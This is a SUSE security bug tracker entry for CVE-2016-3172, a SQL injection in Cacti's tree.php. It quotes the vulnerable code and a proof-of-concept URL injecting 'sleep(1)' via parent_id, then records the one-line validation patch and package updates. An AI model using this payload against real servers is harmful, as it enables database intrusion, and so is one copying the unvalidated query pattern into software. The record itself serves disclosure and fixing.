Bug 971357 - (CVE-2016-3172) VUL-0: CVE-2016-3172: cacti: SQL Injection Vulnerability
(CVE-2016-3172)
VUL-0: CVE-2016-3172: cacti: SQL Injection Vulnerability
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
unspecified
Other Other
: P3 - Medium : Normal
: ---
Assigned To: Aeneas Jaißle
Security Team bot
https://smash.suse.de/issue/163357/
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2016-03-16 09:51 UTC by Victor Pereira
Modified: 2018-08-03 22:12 UTC (History)
3 users (show)

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Victor Pereira 2016-03-16 09:51:54 UTC
CVE-2016-3172

	==========================
Advisory: Cacti SQL Injection Vulnerability
Author: Do9gy of Tencent Security Platform Department
Affected Version: 0.8.8.g(the latest version & the older versions)
==========================
Vulnerability Description
==========================

Recetly, I found a SQL Injection Vulnerability in ‘Cacti-0.8.8g' program, Cacti is widely used in many companies.
Vulnerable file: /cacti/tree.php:
line 208:
==========================================================================================================================================
    switch ($current_type) {
    case TREE_ITEM_TYPE_HEADER:
        $i = 0;
        /* it's nice to default to the parent sorting style for new items */
        if (empty($_GET["id"])) {
            $default_sorting_type = db_fetch_cell("select sort_children_type from graph_tree_items where id=" . $_GET["parent_id"]);
        }else{
            $default_sorting_type = TREE_ORDERING_NONE;
        }

==========================================================================================================================================

The parameter parent_id is used without any validation.
==========================
POC && EXP
==========================
1. Login

2. http://target/cacti-0.8.8g/tree.php?action=item_edit&tree_id=2&parent_id=8%20and%20sleep(1) [^]

3. mysql log: select sort_children_type from graph_tree_items where id=8 and sleep(1)

References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3172
http://seclists.org/oss-sec/2016/q1/651
Comment 1 Victor Pereira 2016-03-16 09:52:48 UTC
This seems to fix it...

diff -u tree.php.orig tree.php
--- tree.php.orig       2016-03-15 15:15:37.646641203 -0500
+++ tree.php    2016-03-15 15:19:45.966120414 -0500
@@ -153,6 +153,7 @@
        /* ================= input validation ================= */
        input_validate_input_number(get_request_var("id"));
        input_validate_input_number(get_request_var("tree_id"));
+       input_validate_input_number(get_request_var("parent_id"));
        /* ==================================================== */

        if (!empty($_GET["id"])) {
Comment 3 Swamp Workflow Management 2016-03-16 23:00:33 UTC
bugbot adjusting priority
Comment 4 David Liedke 2016-05-09 12:05:34 UTC
Cacti 0.8.8h released.

Fix for 0.8.8f:
https://build.opensuse.org/request/show/394348
Comment 5 Aeneas Jaißle 2016-05-11 09:37:28 UTC
SR#394348 accepted.

Maintenance target got moved to project openSUSE:Maintenance:5077
Comment 6 Swamp Workflow Management 2016-05-18 12:09:56 UTC
openSUSE-SU-2016:1328-1: An update that fixes two vulnerabilities is now available.

Category: security (moderate)
Bug References: 971357,974013
CVE References: CVE-2016-3172,CVE-2016-3659
Sources used:
openSUSE Leap 42.1 (src):    cacti-0.8.8f-11.1
openSUSE 13.2 (src):    cacti-0.8.8f-4.16.1
Comment 7 Marcus Meissner 2016-08-01 15:10:10 UTC
released
Comment 8 Swamp Workflow Management 2018-07-28 18:11:41 UTC
This is an autogenerated message for OBS integration:
This bug (971357) was mentioned in
https://build.opensuse.org/request/show/625957 Backports:SLE-12 / cacti
Comment 9 Swamp Workflow Management 2018-08-03 22:12:59 UTC
openSUSE-OU-2018:2194-1: An update that fixes 33 vulnerabilities is now available.

Category: optional (low)
Bug References: 022564,1047512,1048102,1050950,1051633,1054390,1054742,1067163,1067164,1067166,1068028,1101024,1101139,837440,862993,867607,870821,872008,934187,937997,958863,958977,960678,965930,971357,974013
CVE References: CVE-2006-6799,CVE-2007-3112,CVE-2007-3113,CVE-2013-5588,CVE-2013-5589,CVE-2014-2326,CVE-2014-2327,CVE-2014-2328,CVE-2014-2708,CVE-2014-2709,CVE-2014-4000,CVE-2014-4002,CVE-2014-5025,CVE-2014-5026,CVE-2015-4342,CVE-2015-4634,CVE-2015-8369,CVE-2015-8377,CVE-2015-8604,CVE-2016-2313,CVE-2016-3172,CVE-2016-3659,CVE-2017-10970,CVE-2017-11163,CVE-2017-11691,CVE-2017-12065,CVE-2017-12927,CVE-2017-12978,CVE-2017-15194,CVE-2017-16641,CVE-2017-16660,CVE-2017-16661,CVE-2017-16785
Sources used:
SUSE Package Hub for SUSE Linux Enterprise 12 (src):    cacti-1.1.38-2.1